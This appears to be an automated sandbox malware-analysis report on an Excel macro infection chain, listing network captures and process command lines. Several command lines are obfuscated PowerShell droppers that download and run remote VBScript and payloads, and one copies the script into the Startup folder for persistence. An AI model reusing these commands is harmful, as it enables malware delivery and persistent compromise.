                Data Ascii: 1,011K101,01101101,K101110,01K1K1,01K1111,K101110,01K1101,011K101,01101101,K1K111,K1KK0,K101011,K1KK0,K1K111,01101111,0111K10,01111K1,0101K11,K1K111,K1KK0,K101011,K1KK0,K1K111,011101K,0111K10,011K101,011KK1,01101101,K1K111,K101K1,011111K,01K1K
                Aug 26, 2022 00:13:21.876157045 CEST53INData Raw: 4b 2c 4b 31 4b 31 31 31 2c 4b 31 4b 4b 30 2c 4b 31 30 31 30 31 31 2c 4b 31 4b 4b 30 2c 4b 31 4b 31 31 31 2c 4b 31 31 4b 31 30 2c 4b 31 31 30 31 4b 2c 4b 31 30 31 4b 31 2c 4b 31 4b 31 31 31 2c 4b 31 30 31 4b 31 2c 30 31 31 31 31 31 4b 2c 30 31 4b
                Data Ascii: K,K1K111,K1KK0,K101011,K1KK0,K1K111,K11K10,K1101K,K101K1,K1K111,K101K1,011111K,01K1K1,011KK0,01K0101,011KK0,01011K0,KK1101,KK1010,K1KK0,K1KK0,K1KK0,K1KK0,01110111,01101K0,01101K1,011011K,011K101,K101K0,K1K1K,011101K,0111K10,01110101,011K101,K1
                Aug 26, 2022 00:13:21.985343933 CEST55INData Raw: 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 31 4b 4b 30 2c 4b 4b 31 31 30 31 2c 4b 4b 31 30 31 30 2c 4b 4b 31 4b 31 2c 4b 4b 31 4b 31 2c 30 31 30 31 31 30 31 31 2c
                Data Ascii: 1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,K1KK0,KK1101,KK1010,KK1K1,KK1K1,01011011,011K010,01111K1,011101K,011K101,01011011,01011101,01011101,K1KK0,K1K1K,011K010,01101111,01110101,011101K,K1KK0,K111101,K1KK0,K1K1K,0111KK,01011K0,01010111,011KK1
                Aug 26, 2022 00:13:21.985383987 CEST56INData Raw: 52 2a 42 46 2c 52 2a 46 39 2c 52 2a 39 30 2c 52 2a 39 33 2c 52 2a 45 37 2c 52 2a 37 42 2c 52 2a 39 45 2c 52 2a 37 33 2c 52 2a 43 45 2c 52 2a 37 33 2c 52 2a 39 45 2c 52 2a 46 44 2c 52 2a 33 43 2c 52 2a 43 46 2c 52 2a 46 42 2c 52 2a 41 36 2c 52 2a
                Data Ascii: R*BF,R*F9,R*90,R*93,R*E7,R*7B,R*9E,R*73,R*CE,R*73,R*9E,R*FD,R*3C,R*CF,R*FB,R*A6,R*38,R*97,R*6E,R*05,R*09,R*00,R*48,R*F1,R*F3,R*DA,R*6B,R*00,R*5F,R*00,R*FE,R*DF,R*09,R*F8,R*EB,R*FF,R*4E,R*E3,R*A7,R*59,R*F9,R*A5,R*66,R*78,R*B0,R*EE,R*1B,R*FB,R*B
                Aug 26, 2022 00:13:21.985408068 CEST57INData Raw: 36 2c 52 2a 44 42 2c 52 2a 46 36 2c 52 2a 44 46 2c 52 2a 31 31 2c 52 2a 31 35 2c 52 2a 44 41 2c 52 2a 39 33 2c 52 2a 41 42 2c 52 2a 32 45 2c 52 2a 34 31 2c 52 2a 33 32 2c 52 2a 44 38 2c 52 2a 30 33 2c 52 2a 41 41 2c 52 2a 43 42 2c 52 2a 45 39 2c
                Data Ascii: 6,R*DB,R*F6,R*DF,R*11,R*15,R*DA,R*93,R*AB,R*2E,R*41,R*32,R*D8,R*03,R*AA,R*CB,R*E9,R*BB,R*55,R*2D,R*01,R*03,R*30,R*9B,R*0A,R*C6,R*D1,R*93,R*A4,R*58,R*D5,R*04,R*50,R*4F,R*55,R*87,R*76,R*C3,R*0E,R*A4,R*03,R*7A,R*19,R*52,R*FD,R*0F,R*5E,R*7B,R*ED,R
                Aug 26, 2022 00:13:21.985431910 CEST59INData Raw: 2a 37 32 2c 52 2a 30 46 2c 52 2a 30 41 2c 52 2a 35 44 2c 52 2a 43 42 2c 52 2a 43 41 2c 52 2a 32 35 2c 52 2a 30 37 2c 52 2a 36 30 2c 52 2a 38 44 2c 52 2a 45 41 2c 52 2a 39 30 2c 52 2a 36 39 2c 52 2a 45 33 2c 52 2a 34 44 2c 52 2a 38 42 2c 52 2a 32
                Data Ascii: *72,R*0F,R*0A,R*5D,R*CB,R*CA,R*25,R*07,R*60,R*8D,R*EA,R*90,R*69,R*E3,R*4D,R*8B,R*2A,R*85,R*7F,R*93,R*15,R*FE,R*08,R*D2,R*8A,R*67,R*50,R*CE,R*34,R*9C,R*A7,R*DC,R*08,R*B0,R*A9,R*F2,R*BF,R*28,R*97,R*DA,R*33,R*B3,R*AB,R*AA,R*5C,R*AA,R*92,R*61,R*BB
                Aug 26, 2022 00:13:21.985459089 CEST60INData Raw: 2c 52 2a 31 35 2c 52 2a 36 44 2c 52 2a 36 43 2c 52 2a 43 42 2c 52 2a 41 33 2c 52 2a 44 46 2c 52 2a 35 38 2c 52 2a 41 46 2c 52 2a 44 39 2c 52 2a 44 37 2c 52 2a 37 38 2c 52 2a 46 33 2c 52 2a 35 35 2c 52 2a 46 33 2c 52 2a 39 30 2c 52 2a 39 35 2c 52
                Data Ascii: ,R*15,R*6D,R*6C,R*CB,R*A3,R*DF,R*58,R*AF,R*D9,R*D7,R*78,R*F3,R*55,R*F3,R*90,R*95,R*FD,R*B1,R*75,R*89,R*7B,R*C8,R*4F,R*56,R*EF,R*01,R*84,R*F5,R*58,R*3E,R*88,R*6F,R*C6,R*72,R*F6,R*E0,R*A0,R*68,R*A8,R*31,R*34,R*90,R*0E,R*3A,R*74,R*41,R*BD,R*9E,R*
                Aug 26, 2022 00:13:21.985482931 CEST62INData Raw: 42 39 2c 52 2a 46 43 2c 52 2a 38 30 2c 52 2a 33 39 2c 52 2a 34 30 2c 52 2a 44 41 2c 52 2a 37 31 2c 52 2a 36 36 2c 52 2a 46 42 2c 52 2a 31 34 2c 52 2a 39 42 2c 52 2a 32 37 2c 52 2a 38 36 2c 52 2a 42 42 2c 52 2a 36 39 2c 52 2a 33 30 2c 52 2a 44 31
                Data Ascii: B9,R*FC,R*80,R*39,R*40,R*DA,R*71,R*66,R*FB,R*14,R*9B,R*27,R*86,R*BB,R*69,R*30,R*D1,R*96,R*A5,R*77,R*F3,R*C3,R*2B,R*87,R*66,R*B3,R*67,R*6B,R*36,R*8C,R*F5,R*B5,R*45,R*4A,R*B5,R*60,R*8A,R*EB,R*A1,R*35,R*48,R*CC,R*CC,R*33,R*6B,R*47,R*BB,R*99,R*2F,
                Aug 26, 2022 00:13:21.985508919 CEST63INData Raw: 52 2a 43 38 2c 52 2a 38 30 2c 52 2a 45 36 2c 52 2a 36 32 2c 52 2a 43 42 2c 52 2a 42 41 2c 52 2a 33 46 2c 52 2a 45 32 2c 52 2a 42 32 2c 52 2a 33 46 2c 52 2a 36 32 2c 52 2a 44 45 2c 52 2a 31 46 2c 52 2a 32 44 2c 52 2a 37 45 2c 52 2a 34 36 2c 52 2a
                Data Ascii: R*C8,R*80,R*E6,R*62,R*CB,R*BA,R*3F,R*E2,R*B2,R*3F,R*62,R*DE,R*1F,R*2D,R*7E,R*46,R*CB,R*FE,R*D0,R*22,R*0E,R*9D,R*6F,R*C5,R*36,R*17,R*F5,R*B7,R*8B,R*EF,R*ED,R*EF,R*90,R*A8,R*2E,R*42,R*DB,R*F7,R*96,R*77,R*86,R*61,R*6A,R*87,R*7F,R*59,R*F7,R*EE,R*4


                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249171194.247.196.66443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampkBytes transferredDirectionData
                2022-08-25 22:13:09 UTC0OUTGET /sync/gith.vbs HTTP/1.1
                Host: kopadd.yunethosting.rs
                Connection: Keep-Alive
                2022-08-25 22:13:09 UTC0INHTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:09 GMT
                Server: Apache
                Last-Modified: Thu, 25 Aug 2022 05:51:44 GMT
                ETag: "c629a7-9c0-5e70a64709a1f"
                Accept-Ranges: bytes
                Content-Length: 2496
                Connection: close
                Content-Type: text/vbscript
                2022-08-25 22:13:09 UTC0INData Raw: 0d 0a 0d 0a 46 77 4c 52 74 6d 70 79 3d 57 47 4a 48 28 29 0d 0a 0d 0a 0d 0a 0d 0a 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 4b 64 79 48 28 73 74 72 29 0d 0a 48 6b 6e 42 56 71 4e 20 3d 20 22 22 0d 0a 54 54 52 5a 3d 22 4d 69 22 20 2b 20 22 64 28 73 74 22 20 2b 20 22 72 2c 69 2c 31 29 22 0d 0a 46 6f 72 20 69 3d 32 2d 31 20 74 6f 20 45 76 61 6c 28 65 6c 66 6a 6a 65 28 29 29 0d 0a 20 20 20 20 63 68 61 72 20 3d 20 45 76 61 6c 28 54 54 52 5a 29 0d 0a 20 20 20 20 69 66 28 63 68 61 72 3c 3e 22 20 22 29 20 74 68 65 6e 0d 0a 20 20 20 20 48 6b 6e 42 56 71 4e 20 3d 20 48 6b 6e 42 56 71 4e 2b 4d 69 64 28 73 74 72 2c 69 2c 31 29 0d 0a 20 20 20 20 45 6e 64 20 69 66 0d 0a 4e 65 78 74 0d 0a 4b 64 79 48 20 3d 20 48 6b 6e 42 56 71 4e 0d 0a 45 6e 64 20 46 75 6e 63 74
                Data Ascii: FwLRtmpy=WGJH()Private Function KdyH(str)HknBVqN = ""TTRZ="Mi" + "d(st" + "r,i,1)"For i=2-1 to Eval(elfjje()) char = Eval(TTRZ) if(char<>" ") then HknBVqN = HknBVqN+Mid(str,i,1) End ifNextKdyH = HknBVqNEnd Funct


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249175194.247.196.66443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampkBytes transferredDirectionData
                2022-08-25 22:13:28 UTC2OUTGET /sync/gith.vbs HTTP/1.1
                Host: kopadd.yunethosting.rs
                Connection: Keep-Alive
                2022-08-25 22:13:29 UTC2INHTTP/1.1 200 OK
                Date: Thu, 25 Aug 2022 22:13:29 GMT
                Server: Apache
                Last-Modified: Thu, 25 Aug 2022 05:51:44 GMT
                ETag: "c629a7-9c0-5e70a64709a1f"
                Accept-Ranges: bytes
                Content-Length: 2496
                Connection: close
                Content-Type: text/vbscript
                2022-08-25 22:13:29 UTC3INData Raw: 0d 0a 0d 0a 46 77 4c 52 74 6d 70 79 3d 57 47 4a 48 28 29 0d 0a 0d 0a 0d 0a 0d 0a 50 72 69 76 61 74 65 20 46 75 6e 63 74 69 6f 6e 20 4b 64 79 48 28 73 74 72 29 0d 0a 48 6b 6e 42 56 71 4e 20 3d 20 22 22 0d 0a 54 54 52 5a 3d 22 4d 69 22 20 2b 20 22 64 28 73 74 22 20 2b 20 22 72 2c 69 2c 31 29 22 0d 0a 46 6f 72 20 69 3d 32 2d 31 20 74 6f 20 45 76 61 6c 28 65 6c 66 6a 6a 65 28 29 29 0d 0a 20 20 20 20 63 68 61 72 20 3d 20 45 76 61 6c 28 54 54 52 5a 29 0d 0a 20 20 20 20 69 66 28 63 68 61 72 3c 3e 22 20 22 29 20 74 68 65 6e 0d 0a 20 20 20 20 48 6b 6e 42 56 71 4e 20 3d 20 48 6b 6e 42 56 71 4e 2b 4d 69 64 28 73 74 72 2c 69 2c 31 29 0d 0a 20 20 20 20 45 6e 64 20 69 66 0d 0a 4e 65 78 74 0d 0a 4b 64 79 48 20 3d 20 48 6b 6e 42 56 71 4e 0d 0a 45 6e 64 20 46 75 6e 63 74
                Data Ascii: FwLRtmpy=WGJH()Private Function KdyH(str)HknBVqN = ""TTRZ="Mi" + "d(st" + "r,i,1)"For i=2-1 to Eval(elfjje()) char = Eval(TTRZ) if(char<>" ") then HknBVqN = HknBVqN+Mid(str,i,1) End ifNextKdyH = HknBVqNEnd Funct


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:00:12:17
                Start date:26/08/2022
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13ff70000
                File size:28253536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:2
                Start time:00:12:21
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
                Imagebase:0xff780000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:3
                Start time:00:12:22
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
                Imagebase:0x13fc50000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Target ID:5
                Start time:00:12:26
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
                Imagebase:0xff570000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:6
                Start time:00:12:27
                Start date:26/08/2022
                Path:C:\Program Files\Internet Explorer\iexplore.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                Imagebase:0x13f340000
                File size:814288 bytes
                MD5 hash:4EB098135821348270F27157F7A84E65
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:8
                Start time:00:12:30
                Start date:26/08/2022
                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1204 CREDAT:275457 /prefetch:2
                Imagebase:0x13e0000
                File size:815304 bytes
                MD5 hash:8A590F790A98F3D77399BE457E01386A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:10
                Start time:00:12:35
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110010,00110000,00111001,00101110,00110001,00110010,00110111,00101110,00110010,00110000,00101110,00110001,00110011,00101111,01110010,01100101,01101101,01101001,01110100,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Target ID:12
                Start time:00:12:35
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\user\AppData\Local\Temp\qwe.vbs' -Destination 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs'
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Target ID:14
                Start time:00:12:42
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sfoWQ.js"
                Imagebase:0xff5d0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Target ID:15
                Start time:00:12:42
                Start date:26/08/2022
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ewq\''+pmet:vne$,''sbv.htig/cnys/sr.gnitsohtenuy.ddapok//:sptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\qwe.vbs');remove-item ($env:appdata + '\sfoWQ.js')
                Imagebase:0x13f3d0000
                File size:473600 bytes
                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET

                General

                Target ID:17
                Start time:00:12:46
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\qwe.vbs"
                Imagebase:0xffea0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                General

                Target ID:18
                Start time:00:12:48
                Start date:26/08/2022
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qwe.vbs"
                Imagebase:0xffea0000
                File size:168960 bytes
                MD5 hash:045451FA238A75305CC26AC982472367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language

                Disassembly

                Reset < >

                  Executed Functions

                  Function 000007FF00280B85 Relevance: .2, Instructions: 211COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.934624491.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ff00280000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c7d078749796a0cb938d0a48f59d7a0228ec38375dac872ad84b5565a098099
                  • Instruction ID: 22422d8c73ca5d2a9dfe56fead22a93828224a7274a84b51bc5f524ae79ed94c
                  • Opcode Fuzzy Hash: 9c7d078749796a0cb938d0a48f59d7a0228ec38375dac872ad84b5565a098099
                  • Instruction Fuzzy Hash: AA417C2550FBC65FE74357785CA97A17FB0AF17210F0A01EBD488CB0A3D958595AC3A2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000007FF00280655 Relevance: .2, Instructions: 183COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000003.00000002.934624491.000007FF00280000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FF00280000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_7ff00280000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c9aed10b2827831e48fb27874f0f65b0eeb63ff0809bd84e8d48f40b03d1604e
                  • Instruction ID: 9c62777d71fd080068f6e208300d97eae57d944983b3522ffab22a0f2981bf90
                  • Opcode Fuzzy Hash: c9aed10b2827831e48fb27874f0f65b0eeb63ff0809bd84e8d48f40b03d1604e
                  • Instruction Fuzzy Hash: E641BC2190F7C24FE7938B3458A56A27FB19F63211F1A01EBD089CF4A3E9585C5DC762
                  Uniqueness

                  Uniqueness Score: -1.00%